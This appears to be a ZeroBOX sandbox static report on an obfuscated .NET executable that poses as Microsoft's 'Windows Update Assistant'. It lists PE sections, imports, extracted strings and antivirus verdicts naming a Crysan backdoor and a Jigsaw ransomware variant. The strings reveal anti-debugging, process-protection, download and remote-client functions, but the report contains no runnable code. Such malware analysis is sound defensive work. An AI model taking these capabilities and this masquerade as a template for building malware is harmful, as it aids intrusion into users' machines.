Static | ZeroBOX

PE Compile Time

2021-06-21 01:34:18

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
g\x082o\x14^\x1b) 0x00002000 0x00012940 0x00012a00 7.9976015782
.text 0x00016000 0x000209c0 0x00020a00 4.93116214489
.rsrc 0x00038000 0x00000933 0x00000a00 4.51844034436
(no name shown) 0x0003a000 0x00000010 0x00000200 0.142635768149
.reloc 0x0003c000 0x0000000c 0x00000200 0.0980041756627

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000380a0 0x00000400 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000384a0 0x00000493 LANG_NEUTRAL SUBLANG_NEUTRAL exported SGML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x43a000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
`.reloc
_@jj/w
/yV[6&
~$dzRI
MC(Fn4
tS6cK
mj][i,
9Y\<i|
S~S,w"
lT+"W9
Fx-gtT
=[P%$9
xV.Grs
S@No(b
L82Ic\
h!B6H]
.9OfPc
QxF7*m
bn@T'.
C(uvQVz
U~%U?HE
>,NZnD
'F<ML_
jAfFYn
"'Yrtq
/9A7+z;
>PmQ_G
>+:%*2
X}u##D
LdVP?ph
WEMk!j
N)?P5[
YT4%Ek
cY>d;->
)w)Y8}Z9uMY
2wRt*9+
sjlw)Mc
yqmM"D
iHR?WAQ
jR`wUA
30gO}9
~G9ZAmS
[Jx~Md
?7F#3p
x6v3^E
s?`nI^`h{
wBp(vm
aD;gmg
p:fk=J4
ug<K2&
4nI^FG
/V6>mU
FLUBBF
=VbEnd
}<xKc@
0<3xkr|4A
P]!CSI_
nL3O+L
y2-cSR
_&D:.p
_.46xb
Y(L2l[
%/\2|A
Km)U5s
o4?g$E`
A^ei4W
[T?JUs
/_%*pN
B^I;hAW<
!O Q:')
^3uCWy
9E0gC"
Hv1-?Z
oT3=jx
p/LI9Q$t[
l.x_v,
~c]FfO78
cg\HgD
\Zfx+:
U^c!r^XR
z`(ps.
80#Y[,3!
)l.@")V
?uJh)"o
J`h\@;
B`]1e
}t|{,Y)
2\$s\k^d
$G}dKN
Ta)8~S
pqrk4?[
1s$&;}
%>5XnQl
=5%z]@M
3|JvYO_
pAb/b/`s
'`}uKR:
aP822
h'%S@y
7>4!Fzr
W{sf=@
=--^/g,
,6#XQS6
_q=k }
`VN;}V
b5BXqRo
^B=V`R
"Wf5L{
%?Cx6O
!o k"e
R/2&0|
<a2:};r
XK:3Z-a2
.]X&~(
pS%[JP?,
8[[DQP
bXf>bj_
!ML}Sg
)>#lpa
",y@@Q
K7s~(rR
i@eF-G
%Pe;n(
9kte%+
* ~R4"8
vL~a8&
gb+%&8
XGR yM
Y#:%&8
l$XZa8]
9 X8'-Z
5H5a8E
9 d=i^Z =_
Au%&8f
X ntinT
Fv-a87
ntdlT
X l.dlT
NtCoT
X ntinT
fhIa8M
ntdlT
NtCoT
Z >0<ca8
Q!0a8m
njZ kU
X l.dlT
Z eCYa8#
QSKZ EP
2AZ *q
_CorExeMain
mscoree.dll
v4.0.30319
#Strings
#Strings
#Schema
ujxckjczud&&
>1$oNQTXniul"EynrQ1KRCQP,
Action`10
cc967ef09d143d65cec7d721e1285cb40
cdeaa3f7524deeaa6db8773bc33c62090
cd3e19d49eb7073b5cdab23185c4f2e01
c3ad466b0c83b540d4704c7e51adf0f01
c59c3a1a3135a9818a7987f6dff7fe331
c30b0fa7843e82c982115c09cdcf9f361
c222db56cc22c9c2d3693783767772a91
IEnumerable`1
CallSite`1
List`1
c90bbfaa16d3e753ea47358837adc9e02
c7f8ee1bdee6edbff44c7372247edb512
cdee14a3f93986be2645150e12722bc22
Microsoft.Win32
ToUInt32
ToInt32
cd828bc264604c1019eeb591969758a52
c49a32198154305376d341d477a88cf72
c5c1273cda00a170ef87aaf449c6cb7b2
c80100bbeff9af75b79465589f06bb8e2
X509Certificate2
ca637a05f9b153128adcc1e004be49973
ToUInt64
ToInt64
cf686a086e3a80d250c685a36de35ab74
c2ffd6489f6c284c34f6ea5f1cb13d9f4
c37fecba71ea94749a3149aeb0cda9675
c898602c7e2d651b9bd93f1e9c083b895
ToUInt16
ToInt16
HMACSHA256
c26240c233101b9aeaef254a328f8c196
c9f3bc9d406cb6013f2e69af25a066d96
c24da1a738275dbad062e57e97f771e27
c2d5d91be06d69bd25e9ebbc55c00f4a7
c0cd4e806b023ad1f253d292e20796ca7
c17db9e050e57ed6eeb06930f112e2b28
ccd21cbbbd37a615e817b401874408c38
get_UTF8
caad94cb1774c5311f6e53c30839cda19
c5c5d5a41a26acb3968c4054a34399949
ca50b3050e034346585c8f4fea9318989
c9ba8ab020af1dac85c28e3ae668f9a99
cc549fbe364cdebe38a240871654ff5d9
<Module>
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
get_FormatID
GetHINSTANCE
get_ASCII
System.IO
ES_CONTINUOUS
get_IV
set_IV
GenerateIV
value__
c79c6453c53ecc3935e4619d5700b23ea
ReadServertData
cfdd49e22bb45d4085acfbad9f56780db
mscorlib
c79d7477ac60765d8f2ee1fa9729a8c0c
c8bfa9c95177ab96d5067a58144c3f26c
c869fe7c827b58bc8f37df88ddd50eeec
System.Collections.Generic
Microsoft.VisualBasic
get_c074ca04a8282ed1e8e7ab92e51e2742d
c696a5af8ffcfe8e477818963258a073d
ce16e2f04cbd70d157aa7edf728dab15d
c6520137e72ed4b8dcc587ecb1007cf6d
ca67f4d38e9408544a59ca927ab4ccf6d
c266c88149b9276025c29ea50c7d54dad
EndRead
BeginRead
get_CurrentThread
c8edddcac44fab61635c5a44de98153bd
SHA256Managed
get_IsAttached
get_Connected
get_Guid
Append
RegistryValueKind
set_IsBackground
GetMethod
ujxckjczud
c8a13d39b25613907561f9398ab87616e
c7a74da7c9667b6d13f36581efda0da9e
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
get_Unicode
ce205ba9dcb9a066297f59105a8ca74ee
DeleteSubKeyTree
get_Message
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
SaveBytesToFile
IsInRole
WindowsBuiltInRole
GetActiveWindowTitle
get_Module
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FullyQualifiedName
get_FileName
set_FileName
GetTempFileName
GetFileName
fileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
ValueType
ProtocolType
GetType
SocketType
GetElementType
FileShare
System.Core
MethodBase
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
SuppressIldasmAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ConfusedByAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_IsAlive
add_ResourceResolve
add_AssemblyResolve
Remove
ujxckjczud.exe
set_BlockSize
get_InputBlockSize
get_OutputBlockSize
get_TotalSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
cab4558c64de98ae3f1ef20320dccdd7f
c9e58f652186bc7a1d32767b52696918f
IndexOf
c1c2e5825c12a577c04ba79214f02e5af
ce6fdf791c1ce29b329068547c2e698af
c7c42bbd3c41b7ffdfe6b29ae2d297acf
cd7d20763071225193fe25c678b1c8fff
CryptoConfig
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
UTF8Encoding
System.Drawing.Imaging
IsLogging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
BytesAsString
GetAsString
GetString
BytesAsHexString
Substring
System.Drawing
set_ErrorDialog
ComputeHash
strToHash
GetHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
StartsWith
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
TransformFinalBlock
TransformBlock
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
kernel32.dll
user32.dll
ntdll.dll
GetManifestResourceStream
FileStream
DeflateStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
ToBoolean
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Globalization
System.Reflection
X509CertificateCollection
ManagementObjectCollection
get_Position
set_Position
CryptographicException
ArgumentNullException
ArgumentException
Intern
Unknown
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
Microsoft.CSharp
System.Linq
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
DESCryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
GetEncoder
Buffer
Integer
Debugger
ManagementObjectSearcher
ResolveEventHandler
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
NumberStyles
GetManifestResourceNames
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Encode2Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
ResolveEventArgs
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
Compress
Decompress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
Antivirus
JCEsTmpjtlAHUTVOExXeAqZVMOws
Concat
ImageFormat
format
FindObject
ManagementBaseObject
ForcePathObject
Collect
Connect
Reconnect
VirtualProtect
System.Net
Target
Client.Handle_Packet
Socket
op_Explicit
ClientOnExit
IAsyncResult
ToUpperInvariant
WebClient
InitializeClient
AuthenticateAsClient
System.Management
Environment
get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
Decrypt
Encrypt
ParameterizedThreadStart
Convert
FailFast
ToList
MoveNext
System.Text
GetWindowText
GetForegroundWindow
set_CreateNoWindow
CloseMutex
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
GetCallingAssembly
GetExecutingAssembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
set_Capacity
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
Confuser.Core 1.5.0+b5197549e4
WrapNonExceptionThrows
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
1.0.0.0
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
Microsoft Corporation
FileDescription
Windows Update
FileVersion
1.0.0.0
InternalName
Windows Update Assistant.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
LegalTrademarks
OriginalFilename
Windows Update Assistant.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Ransom.Jigsaw.10
FireEye Generic.mg.e4f78978c7623924
CAT-QuickHeal Clean
Qihoo-360 Clean
ALYac Gen:Variant.Ransom.Jigsaw.10
Cylance Unsafe
VIPRE Clean
AegisLab Trojan.MSIL.Crysan.m!c
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 005797941 )
BitDefender Gen:Variant.Ransom.Jigsaw.10
K7GW Trojan ( 005797941 )
Cybereason malicious.8c7623
Baidu Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Agent.DHI
APEX Malicious
Avast Win32:Trojan-gen
ClamAV Clean
Kaspersky HEUR:Backdoor.MSIL.Crysan.gen
Alibaba Backdoor:MSIL/Crysan.60a46ae8
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Gen:Variant.Ransom.Jigsaw.10
Sophos Mal/Generic-S
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro TROJ_GEN.R06CC0DFK21
McAfee-GW-Edition BehavesLike.Win32.Generic.dh
CMC Clean
Emsisoft Gen:Variant.Ransom.Jigsaw.10 (B)
Ikarus Trojan.MSIL.Agent
GData Gen:Variant.Ransom.Jigsaw.10
Jiangmin Clean
Webroot W32.Trojan.Gen
Avira HEUR/AGEN.1121272
MAX malware (ai score=85)
Antiy-AVL Clean
Kingsoft Win32.Heur.KVMH008.a.(kcloud)
Gridinsoft Trojan.Heur!.03013281
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Backdoor.MSIL.Crysan.gen
Microsoft Trojan:MSIL/Ursu.KP
Cynet Malicious (score: 100)
AhnLab-V3 Clean
Acronis Clean
McAfee RDN/Generic BackDoor
TACHYON Clean
VBA32 CIL.HeapOverride.Heur
Malwarebytes Trojan.Crypt.MSIL
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R06CC0DFK21
Tencent Win32.Trojan.Ransom.Amlz
Yandex Clean
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_99%
Fortinet W32/Crysan.DHI!tr.bdr
BitDefenderTheta Gen:NN.ZemsilF.34758.nu0@aeND!Up
AVG Win32:Trojan-gen
Paloalto generic.ml
CrowdStrike win/malicious_confidence_100% (W)
MaxSecure Trojan.Malware.300983.susgen
No IRMA results available.